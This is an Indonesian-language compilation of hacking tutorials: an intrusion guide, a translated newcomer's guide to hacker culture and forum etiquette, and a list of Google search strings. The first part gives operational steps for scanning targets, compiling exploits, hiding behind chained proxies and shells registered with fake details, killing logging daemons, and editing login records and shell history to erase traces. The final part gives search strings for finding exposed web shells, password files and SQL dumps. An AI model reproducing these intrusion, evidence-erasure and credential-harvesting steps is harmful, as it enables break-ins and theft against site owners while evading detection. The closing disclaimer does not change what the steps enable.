Orang-orang yang mendeface menjadi terkenal atau untuk menunjukkan bahwa mereka sangat terampil dan hebat, perlu kedewasaan dan menyatakan bahwa ada cara yang lebih baik ketimbang melakukan deface dengan alasan yang dibuat-buat.


Scanning Script Kiddie: Anda perlu mengetahui adanya celah keamanan, entah itu pada service yang dijalankan, sistem operasi atau file CGI-nya. Bagaimana cara anda mengetahui adanya celah keamanan? Versi berapa yang dijalankan? anda perlu mengetahui bagaimana mencarinya exploit web di internet (dengan google.com). Menggunakan suatu script untuk scanning range ip pada port tertentu yang memiliki celah keamanan. Atau menggunakan http://www.netcraft.com/ untuk mengetahui jenis server, sistem operasi dan aplikasi yang dijalankan (frontpage, php, asp, dsb..). nMap dan port scanner lainnya dapat melakukan scanning dengan cepat terhadap ribuan ip pada suatu port yang terbuka. Ini merupakan teknik favorit bagi mereka yang ingin melakukan hacking secara massal.


Website Target Script Kiddie: Sebaiknya para script kiddies melakukan hack pada berbagai website lawas. Langkah utama adalah mengumpulkan informasi situs tersebut sebanyak mungkin. Mencari sistem operasi yang dijalankan melalui netcraft.com atau menggunakan: telnet http://www.site.com/ 80 kemudian GET /HTTP/1.1 mencari service apa yang dijalankan melalui port scan. Mencari spesifikasi service dengan melakukan telnet. Mencari berbagai script CGI, atau file-file lainnya yang memungkinkan anda mengakses server tersebut dengan mengeksploitasi /cgi /cgi-bin dan browsing ke website tersebut.

Setelah mencari berbagai informasi yang anda miliki selanjutnya anda dapat melakukan:


2. Penyusupan
Untuk melakukan hal ini anda dapat mencari berbagai exploit yang dapat digunakan untuk mengakses website tersebut. JIka anda melakukan scanning dan anda akan mengetahui exploit apa yang tepat untuk digunakan. Dua temnpat utama untuk mencari exploit adalah melalui website http://www.securityfocus.com/ dan http://www.packetstormsecurity.org/. Setelah mendapatkan exploit, periksa dan pastikan bahwa exploit tersebut memang untuk versi service, sistem operasi, script dsb yang dijalankan. Exploit umumnya dibuat menggunakan dua bahasa pemrograman yaitu C dan Perl. Script Perl memiliki ekstensi .pl atau .cgi, sedangkan C memiliki ekstensi .c, untuk mengkompilasi suatu file C (pada sistem *nix) gunakan perintah gcc -o exploit12 file.c lalu: ./exploit12. Sedangkan untuk Perl cukup melakukan perintah chmod 700 file.pl (sebenarnya tidak diperlukan) lalu: file Perl.pl. Ini hanyalah teknik kompilasi yang sederhana atau hanya teori kemungkinan exploit. Lakukan saja sedikit penelitian bagaimana cara menggunakannya. Hal lain yanganda perlukan untuk memeriksa apakah exploit tersebut merupakan remote atau local. Jika exploit lokal maka anda harusmemiliki suatu account atau akses secara fisik pada computer tersebut. Jika remote maka anda dapat melakukannya melalui jaringan (internet).

Jangan hanya bisa mengkompilasi exploit, ada satu hal penting yang perlu anda ketahui yaitu:

Menghapus Jejak
Setelah anda mendapatkan informasi mengenai host dengan tujuan mencari suatu exploit yang cocok yang memungkinkan anda menyusup. Mengapa tidak segera melakukannya? masalahnya adalah menghapus jejak hacking anda tergolong sulit, sulit diprediksi. Hanya karena anda meng-"kill" sys log tidak berartibahwa anda tidak terlacak oleh logger atau IDS (Intrusion Detection System) yang dijalankan. Banyak sekali script kiddies yang meremehkan kemampuan para admin yang hostnya mereka jadikan sasaran. Sebagai gantinya para script kiddie mencoba menggunakan account isp kedua untuk memulai hacking, memang akan terlacak tapi takkan tertangkap. JIka anda tidak memiliki fasilitas ini maka anda HARUS memiliki banyak wingate, shell account atau trojan untuk melakukan bounce off. Menghubungkannya secara bersamaan akan menyulitkan seseorang melacak keberadaan anda.Log pada wingate dan shell seringkali dihapus setelah 2-7 hari. Meski log dipelihara seluruhnya, tetap sulit bagi admin untuk melacak lebih jauh wingate atau shell-nya script kiddie sebelum log tersebut harus dihapus. Dan jarang sekali seorang admin memperhatikan dengan seksama terjadinya suatu serangan, bahkan kecil kemungkinannya mau mengejar attacker, yang penting bagi mereka adalah mengamankan box mereka dan melupakan yang telah terjadi.

Untuk alasan keamanan, jika anda menggunakan wingate dan shell, jangan melakukan apapun untuk mem-"pissed off" admin terlalu banyak (yang membuat mereka memanggil otorisasi atau mencoba melacak keberadaan anda) dan hapuslah log anda agar aman. Bagaimana cara melakukannya?

Ringkasnya, kita memerlukan beberapa wingate. Wingate secara alami cenderung mengubah ip atau shutdown sepanjang waktu, jadi diperlukan daftar terbaru atau program yang melakukan scan di internet. Anda dapat mendapatkan daftar wingate yang up to date di

http://www.cyberarmy.com/lists/wingate/ atau anda juga bisa menggunakan program yang disebut winscan. Nah anggaplah anda memiliki 3 wingate:

212.96.195.33 port 23
202.134.244.215 port 1080
203.87.131.9 port 23

Untuk menggunakannya jalankan telnet dan hubungkan ke port 23, akan terlihat respon seperti ini:

CSM Proxy Server >

Untuk menghubungkan ke wingate berikutnya kita ketikkan ip:port seperti ini:

CSM Proxy Server >202.134.244.215:1080

JIka terjadi error maka proxy yang coba anda hubungi tidak ada atau anda harus login ke proxy. Jika semuanya berjalan dengan baik, anda akan mendapatkan 3 rangkaian dan shell account yang terhubung. Pada shell account tersebut anda dapat melakukan link shell bersamaan dengan:

[j00@server j00]$ ssh 212.23.53.74

Anda memperoleh free shell yang bekerja hingga mendapatkan shell lainnya yang dihack, berikut ini daftar dari free shell account. Ingat, mendaftarlah dengan informasi palsu dan jika memungkinkan, melalui suatu wingate.

SDF (freeshell.org) - http://sdf.lonestar.org/
GREX (cyberspace.org) - http://www.grex.org/
NYX - http://www.nxy.net/
ShellYeah - http://www.shellyeah.org/
HOBBITON.org - http://www.hobbiton.org/
FreeShells - http://www.freeshells.net/
DucTape - http://www.ductape.net/
Free.Net.Pl (Polish server) - http://www.free.net.pl/
XOX.pl (Polish server) - http://www.xox.pl/
IProtection - http://www.iprotection.com/
CORONUS - http://www.coronus.com/
ODD.org - http://www.odd.org/
MARMOSET - http://www.marmoset.net/
flame.org - http://www.flame.org/
freeshells - http://freeshells.net.pk/
LinuxShell - http://www.linuxshell.org/
takiweb - http://www.takiweb.com/
FreePort - http://freeport.xenos.net/
BSDSHELL - http://free.bsdshell.net/
ROOTshell.be - http://www.rootshell.be/
shellasylum.com - http://www.shellasylum.com/
Daforest - http://www.daforest.org/
FreedomShell.com - http://www.freedomshell.com/
LuxAdmin - http://www.luxadmin.org/
shellweb - http://shellweb.net/
blekko - http://blekko.net/

Setelah sebelumnya mendapatkan shell, anda dapat mengkompilasi exploit, dan anda menjadi sulit dilacak. Agar lebih yakin, hapuslah semua bukuti yang menunjukkan keberadaan anda.

Baiklah, ada beberapa hal pada sisi server yang para script kiddies perlu ketahui. Keharusan untuk mengedit atau menghapus log. Script Kiddies sejati munkin menggunakan suatu rootkit yang secara otomatis dapat menghapus log. Ada 2 log utama daemon yang akan saya jelaskan, yaitu klogd yang berupa log kernel, dan syslogd yang berupa log sistem. Langkah pertama untuk melakukan "kill" daemon tersebut agar tidak me-log apapun tindakan anda.

[root@hacked root]# ps -def | grep syslogd
[root@hacked root]# kill -9 pid_of_syslogd

Pada baris pertama kita menemukan pid syslogd, sedangkan baris kedua kita melakukan "kill" daemon tersebut, anda juga dapat menggunakan /etc/syslog.pid untuk mencari pid syslogd.

[root@hacked root]# ps -def | grep klogd
[root@hacked root]# kill -9 pid_of_klogd

Langkah yang sama kita gunakan pula terhadap klogd

Sekarang default logger telah di kill, maka script kiddies perlu menghapusnya dari log. Untuk mencari dimana syslogd menaruh log, periksa file /etc/syslog.conf. Tentunya jika anda tidak peduli kalau admin mengetahui bahwa anda menghapus seluruh log. Dalam hal ini anda benar-benar seorang "perusak", seorang defacer sialan, sang admin akan mengetahui bahwa box mereka disusupi saat website tersebut terdeface. Jadi tidak ada point yang ditambahkan log tersebut, mereka akan menghapusnya. Adapun alasannya adalah agar para admin tidak mengetahui bahwa telah terjadi pembobolan. Saya akan menuliskan alasan utama orang-orang ini membobol suatu box (system).

Mendeface website - lamer, tidak ada tujuan, hanya ingin merusak sistem.

Sniffing password jaringan - ada beberapa program yang memungkinkan anda melakukan sniff password yang dikirimkan dari dan ke suatu sistem. Jika sistem ini berada pada jaringan ethernet maka anda dapat melakukan sniff packet (yang berisikan password) yang diperuntukkan pada berbagai sistem dalam segment tersebut.


Melakukan DDoS attack. - lamer, sang admin memiliki banyak kesempatan untuk memperhatikan bagaimana anda mengirimkan ratusan MB melalui koneksinya.


Melakukan serangan lain pada suatu sistem - teknik ini dan sniffing diatas sangat umum digunakan, bukan pekerjaan lamer. Anda mengetahui bagaimana dengan suatu rootshell anda dapat melancarakan serangan dari sistem ini sebagai ganti dari keterbatasan freeshell. Anda memiliki kendali mutlak terhadap log dari shell tersebut.

Memperoleh Informasi Sensitif - Beberapa sistem perusahaan memiliki informasi berharga seperti database Credit Card, source code piranti lunak, daftar username/password, dan informasi rahasia lainnya yang diinginkan seorang hacker.

Untuk belajar dan bersenang-senang - banyak orang melakukannya demi sensasi hacking dan menambah pengalaman. Saya tidak melihat hal ini sebagai suatu kejahatan sepanjang tidak merusak apapun. Kenyataannya beberapa orang hacker bahkan menolong admin tersebut melakukan patch terhadap 'hole' yang ditemukan. Meski tergolong ilegal, asalkan tidak menghancurkan sistem orang lain.

Saya akan menjelaskan dasar-dasar file log seperti: utmp, wtmp, lastlog, dan .bash_history. File-file ini biasanya berada di /var/log/ tapi saya dengar juga bisa ada di /etc/ /usr/bin dan tempat lainnya. Pada kebanyakan sistem yang berbeda langkah terbaik adalah melakukan find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. dan juga mencari melalui direktori /usr/ /var/ dan /etc/ pada log lainnya. Sekarang akan saya jelaskan ketiga file ini:

utmp merupakan file log yang mencatat siapa saja yang mengakses sistem, saya pikir anda dapat melihat mengapa log ini harus ditambahkan. Karena anda tidak ingin membiarkan siapapun mengatahui bahwa anda berada dalam sistem tersebut.

wtmp merupakan file log yang mencatat proses login dan logout, tentunya anda tidak ingin pula hal ini diketahui oleh admin. Harus diedit untuk menunjukkan bahwa anda tidak pernah login atau logout dan lastlog yang merupakan suatu file yang mencatat rekaman seluruh aktifitas login. Selain itu history dari shell yang anda gunakan juga mencatat seluruh perintah yang anda ketikkan, anda harus mencari pada direktori $ HOME dan mengeditnya.

.sh_history, .history, dan .bash_history merupakan nama umum, yang harus diedit bukan dihapus. Jika anda menghapusnya sama saja memberitahukan kepada admin bahwa "Yuhuuu, Sistem Anda Kebobolan!". Para Newbie Script Kiddies seringkali mendeface dan diikuti rm -rf/ agar aman. Sebisa mungkin hindari hal ini kecuali anda memang rada-rada sinting. Dalam kasus ini saya sarankan agar tidak mencoba mengeksploitasi sistem lagi. Cara lain untuk mencari file log adalah menjalankan suatu script yang memeriksa file-file terbuka (dan secara manual melihatnya untuk menentukan apa saja yang di-log) atau mencari file yang sudah diedit, melalui perintah seperti: find / -ctime 0 -print

Ada beberapa script populer yang dapat menyembunyikan keberadaan anda dari log seperti: zap, clear, dan cloak. Zap berfungsi untuk mengganti keberadaan anda pada log dengan angka 0, sedangkan Clear akan menghapus log dari keberadaan anda, dan Cloak akan mengganti kehadiran anda dengan informasi lain. Menurut pengalaman saya, acct-cleaner cukup berat digunakan script untuk menghapus log account. Banyak rootikit yang memiliki script penghapus log, dan saat menginstallnya log tidak akan mengetahui keberadaan anda. Jika anda berada pada sistem NT, maka file log-nya ada di C:\winNT\system32\LogFiles\, hapus file ini, para admin NT seringkali tidak memeriksa atau mengetahui artinya bila terhapus.

Hal terakhir mengenai penghapusan jejak, saya tidak akan menjelaskan secara rinci mengenai hal ini karena membutuhkan suatu pembahasan tersendiri. Saya hanya membicarakan mengenai rootkit. Apakah rootkit itu? Mereka ini digunakan secara luas guna menghapus jejak anda saat memasuki suatu sistem. Menjadikan anda tetap "hidden" dalam sistem. Login tanpa password, tidak di log oleh wtmp atau lastlog dan bahkan tanpa perlu ada pada file /etc/passwd. Dengan rootkit ini membuat perintah seperti ps untuk menyembunyikan proses, jadi tak seorangpun mengetahui program apa yang sedang anda jalankan. Mereka mengirimkan laporan palsu pada netstat, ls dan seolah-olah semuanya berjalan dengan normal. Oh, jangan senang dulu, ada beberapa kelemahan dari rootkit, pada beberapa perintah yang dilakukan menimbulkan keanehan karena binary tidak bekerja secara benar. Mereka juga meninggalkan fingerprint (cara mengetahui bahwa file ada dalam rootkit). Hanya admin yang hebat saja yang dapat memeriksa rootkit, jadi hal ini bukanlah ancaman serius, tapi patut dipertimbangkan. Rootkit dibuat dengan suatu LKM (loadable kernel modul) yang sangat ideal untuk menyembunyikan keberadaan anda dan kebanyakan admin tidak mengetahui adanya aktifitas mencurigakan.

Dalam menulis tutorial ini saya mengikutkan perasaan. Saya tidak ingin ada lagi script kiddies yang melakukan scanning ratusan website untuk dieksploitasi. Saya tidak ingin nama dan nickname saya dicatut. Saya sudah lelah mendengar orang-orang berkata seperti ini, "Tidak ada sistem komputer yang aman 100%, Update webserver anda, Hacked by ....dst." Meninggalkan nick atau nama kelompok mereka kemudian kabur begitu saja. Saya rasa banyak orang-orang yang ingin mempelajari segala sesuatu dengan tujuan membobol sistem, yang seringkali disamarkan atas nama ilmu pengetahuan.

Tutorial ini mencoba mengatakan bahwa betapa sederhananya memasuki suatu sistem. Namun bukanlah panduan lengkap, saya tidak menjelaskan banyak hal. Saya harap admin menemukan tutorial ini dan merasa terbantu, mempelajari bahwa website-nya harus dijaga dan sering melakukan patch. Melindungi diri sendiri dengan IDS dan menemukan berbagai celah keamanan pada sistem anda sendiri (menggunakan vuln scanner). Juga mengatur setting sistem eksternal untuk melakukan log bukanlah ide yang buruk. Para admin seharusnya melihat beberapa pemikiran script kiddies dan mempelajari beberapa hal yang mereka lakukan... dan menangkap basah mereka yang membobol sistem anda. Adil khan?

Ingatlah, Mendeface sama dengan perusak (lamer). Saya banyak mengetahui orang-orang yang melakukan deface dan sekarang menyesalinya. Anda hanya akan menjadi script kiddie dan tetap seorang lamer abadi.

sekian makasih yach udah di baca
by ::..Mr_Waled..::

Ajari saya bagaimana menjadi Hacker yang baik

Menjadi hacker mungkin adalah salah satu cita-cita orang belajar komputer dan internet. Tetapi apa sebenarnya hacking, dan apa saja yang harus dilakukan untuk menjadi seorang hacker yang baik. Tulisan berikut akan memberikan petunjuk langkah per langkah bagaimana anda belajar. Petunjuk ini cocok juga untuk pemakai internet awal untuk bagaimana mencari informasi di Internet, mencari serial number, membaca artikel security serta tata cara bertanya yang baik disuatu forum diskusi.

Setelah membaca artikel ini walaupun anda membatalkan cita-cita anda, menimal anda telah mengerti pekerjaan berat apa yang harus dilakukan oleh seorang yang ingin menjadi hacker.

Akhirnya selamat membaca.

Salam,

Hendra & Susan Dewichan


--------------------------------------------------------------------------------

The Newbies Guide to the Internet
Originally written on: 7/1/01 revised: 13/1/01
by Clayman



--------------------------------------------------------------------------------
Untuk siapa saja tulisan ini

Tulisan ini ditujukan untuk siapa saja yang tertarik dengan hacking, atau ingin tahu apa yang dimaksud dengan hacking, dan juga bermanfaat bagi siapa saja yang ingin menambah wawasannya tentang komputer dan internet.Petunjuk ini ditujukan untuk tingkat pemula.

Tolong Beritahukan kepada saya bagaimana menjadi seorang hacker

Oh... tidak. Saya rasa anda terlalu banyak nonton film, atau salah pengertian tentang internet, dan berpikiran bahwa melakukan hacking adalah sangat menarik dan saya rasa hal tersebut adalah wajar saja. Kemudian, anda akan bertanya "Ajari saya bagaimana melakukan hack" atau "Bagaimana saya dapat melakukan hack terhadap situs ini". Anda adalah seorang yang panas-panas tahi ayam dan pasti akan diabaikan, dan semua orang akan memanggil anda sebagai lamer, dll ... dan hal ini juga hal yang wajar saja.

Jadi, moral dari cerita tersebut adalah : Sebelum anda bertanya "bagaimana saya dapat menjadi seorang hacker" adalah anda harus mengetahui pekerjaan berat apa yang harus anda lakukan, apa yang dimaksud dengan hacking, dll. Jadi petunjuk ini adalah langkah-langkah yang akan mengajari anda begaimana untuk belajar akan hal tersebut.
Baiklah, tetapi saya tidak mengerti.. apakah itu lamer dan newbie ?

Secara definisi tidak ada. Oleh karena itu adalah dua kata yang berbeda untuk mereka. Anda bingung tentang siapa itu newbie, lamer atau apa artinya "elite", "warez d00d", "script-kiddie" dan "wanna-be"? Mungkin anda tentu saja tidak mengerti apa yang anda baca . Tulisan ini akan menjelaskan hal ini apa ini dan apa itu:

* The Jargon File: http://www.tuxedo.org/~esr/jargon/jargon.html
* Hacker Stages: http://www.elfqrin.com/docs/HackerStages.html

Uhm.. mengapa mereka mengabaikan saya?

Pelajaran 1: Sebelum melakukan posting ke forum tertentu, baca dahulu aturan dan faq forum dari tersebut. Mengapa anda harus? Baiklah, sebagaimana anda ketahui, FAQ adalah singkatan dari frequently asked questions (pertanyaan-pertanyaan yang sering ditanyakan), dan mereka telah bosan akan hal tersebut, kemudian mereka meletakan jawaban di FAQ. Percaya atau tidak, pertanyaan seperti "ajari saya memasuki account hotmail pacar saya" adalah pertanyaan yang paling sering di tanyakan. Maka, jika anda tidak membaca faq, bukan saja anda yang kelihatan seperti idiot, tetapi anda juga menghabiskan waktu orang lain .. maka:

Aturan 1: Baca aturan pada forum. baca FAQ pada forum. Baca dua kali.

Aturan 2: Setelah benar-benar membaca aturan 1, jangan lihat yang lain dekat caps lock.

Ini juga petunjuk yang baik tentang "bagaimana melakukan posting supaya tidak diabaikan" ditulis oleh Raven, baca di www.securitywriters.org

Jadi, bagaimana kira-kira saya mendapatkan jawaban tersebut

Uhmm.. setiap orang tahu tentang yahoo.com, dan hampir setiap orang tahu tentang altavista.com. Jadi internet merupakan suatu jaringan yang sangat BESAR, maka orang menganggap usaha mencari menjadi sesuatu yang penting, sehingga mereka membuat suatu yang disebut dengan SEARCH ENGINES. Jadi, haruskah anda mencari jawan pertanyaan anda sendiri ? Ya anda harus melakukannya. Adalah sangat mungkin pertanyaan yang sama pernah ditanyakan orang lain, dan telah pula dijawab oleh yang lain, jadi gunakanlah search engine untuk pertanyaan seperti "Belajar C++". Masuk ke google.com, ketik pada kotak pencarian "Belajar C++". Sebelum belajar bagaimana melakukan pemrograman, anda mesti tahu untuk apa bahasa pemrograman tersebut, jadi carilah "What is C++". Perhatikan point-point yang ada? Sehingga Anda tidak menyebabkan orang lain melakukan hal yang sama berulang-ulang, melainkan mencari jawaban untuk diri sendiri. Ini merupakan praktek yang baik, jadi anda tidak perlu mencari orang yang dapat menjawab pertanyaan anda, karena sudah pernah ada di Internet, dan anda tinggal mencarinya.

Aturan 3: Gunakan search engine (google.com)
Aturan 4: Gunakan directori (dmoz.org, yahoo.com)

Tetapi situs tersebut tidak memenuhi keinginan saya?

Hmm.. Jika anda mencari search engine yang baik tentang security

* http://astalavista.box.sk

atau security portal yang baik

* http://neworder.box.sk
* http://securityfocus.com
* http://packetstorm.securify.com

Hmm.. Saya tidak suka membaca. Apakah ada saran lain?

Tidak ada. Anda harus banyak membaca. Hal ini adalah keharusan, karena: membaca = ilmu pengetahuan, ilmu pengetahuan = pengertian dan kebijaksanaan. Anda perlu pengertian dan kebijaksanaan untuk menjadi seorang hacker. Sederhananya, jika anda tidak suka membaca, hentikan membaca ini sekarang juga.

Jadi, apa yang anda rekomendasikan saya untuk dibaca?

Saya merekomendasikan anda membaca segala sesuatu yang anda temukan.

* http://neworder.box.sk
* http://blacksun.box.sk
* http://www.securitywriters.org
* http://www.phrack.com
* http://www.elfqrin.com/hack
* http://www.attrition.org --- tulisan ini sangat "panjang*

Uhh.. Siapa itu seorang hacker ? Apa itu hacking?

Ohh, mudah.

* Baca essay "Being Hacker" dan "Open Letter to a wannabe hacker" oleh Elf Qrin dari hacking lab essays
* Baca "The Hacker How-to" oleh Eric S. Raymond dari tuxedo.

Sangat menarik, ajari saya bagaimana melakukan hack

Baca hacking faq yang ada disana .. anda tidak membaca url yang telah saya berikan sebelumnya bukan ? Ketika anda mengerti bahwa pertanyaan ini tidak *berarti* banggalah atas diri anda. Jika anda masih melakukan post pertanyaan ini, baca dari awal petunjuk ini.

Bagaimana saya belajar programming?

Anda dapat membaca pada

* http://code.box.sk

untuk mendapatkan ide yang jelas tentang setiap bahasa. Jangan lupa untuk memeriksa tutorial dari "situs lain". Perlu diketahui bahwa, cara mendownload source-code dan melakukan kompilasi copy/paste TIDAK mengajari anda apa-apa... Jika anda rasa susah mencari source code, pergi ke:

* http://www.sourceforge.net

hal ini akan membuat anda sibuk sesaat.

Ahem, Saya menanyakan serial number dan tidak ada yang menjawab..

Hal ini tidak ada kaitannya dengan security. Ini adalah alasannya, dan anda tidak membaca aturan forum. Memakai software bajakan adalah ilegal, tetapi jika anda ingin memakainya, jangan tanyakan hal tersebut pada forum 'umum', jadi cari www.astalavista.com.

Anda punya saran?

Tentu saja.

+ Jangan menjawab kepada orang yang panas-panas tahi ayam karena hanya membuang waktu anda dan mereka.
+ Jangan membuang waktu dengan membaca pesan pada setiap forum. Bacalah beberapa yang berguna saja seperti Slashdot.org
+ Gunakan web board atau irc sebagai pilihan terakhir untuk mendapatkan informasi.
+ Jangan mengunakan scripts / program kecuali anda tahu apa yang anda lakukan.
+ Jangan mengikuti arus, seperti:

* Jangan katakan produk Microsoft tidak baik kecuali anda telah siap untuk menjawab pertanyaan "Mengapa Visual C++ lebih buruk dibandingkan dengan Borland C++ builder?"

* Jangan katakan "Linux lebih baik" jika anda tidak bisa menjawab "mengapa linux lebih baik" disamping open-source, lebih stabil, cepat, dan aman, serta kelihatan lucu.

* Jangan katakan "Menggunakan GUI tidak lebih baik, gunakan saja command line". Mengetik dengan command tidak membuat l33t. lebih cepat dari pada gui.

* Jangan berkata "Ini [program / cara / script / situs / atau yang lainnya ] lebih baik " tanpa mencoba yang lain. Bagaimana anda tahu sesuatu lebih baik tanpa mencoba setiap pilihan?

Jangan percaya setiap yang anda baca. Jangan merusak situs web orang lain. Bagaimana perasaan anda jika seseorang bermain-main dengan meletakkan gambar porno sebagai wall paper pada anak komputer anda perempuan anda yang berumur 6 tahun? atau jika hardisk yang berisi data penting anda terformat ?

Hmm, Saya tidak ada waktu...

Tidak ada masalah, menjadi pemakai biasa dapat juga bergembira. Bye bye.

Apakah anda seorang hacker?

Tidak.

Mengapa saya harus percaya sama anda?

Anda tidak perlu percaya sama saya .. atau semua orang yang tidak menanyakan hal tersebut. Jika anda merasa yang anda baca masuk akal, gunakan, jika tidak hanya untuk mengetahuinya

Muter Muter Di Paman Google

"parent directory "/e-book/ -xxx -html -htm -php -shtml -opendivx -md5

-md5sums -pdf -chm >>>> untuk cari ebook
"parent directory "/apps/ -xxx -html -htm -php -shtml -opendivx -md5

-md5sums -pdf -chm >>> untuk cari aplikasi
cari shell PHP (intitle:"PHP Shell *" "Enable stderr" filetype:php)

mantap nih buat liat file (sukur2 busa upload sekalian deface)

("Powered by PHPFM" filetype:php -username)

nih buat liat password (tapi beberapa di enkripsi) (wwwboard WebAdmin

inurl:passwd.txt)

intip database admin (allinurl: admin mdb)

panen password SQL (filetype:sql ("passwd values" | "password values" |

"pass values" ))

asik buat ngirim file ("File Upload Manager v1.3" "rename to")

nih masuk database PHP ("File Upload Manager v1.3" "rename to")

buka-bukaan database (intitle:phpMyAdmin "Welcome to phpMyAdmin ***"

"running on * as root@*")

nb : mas p4wiro hehe aku nyruput yach sebagian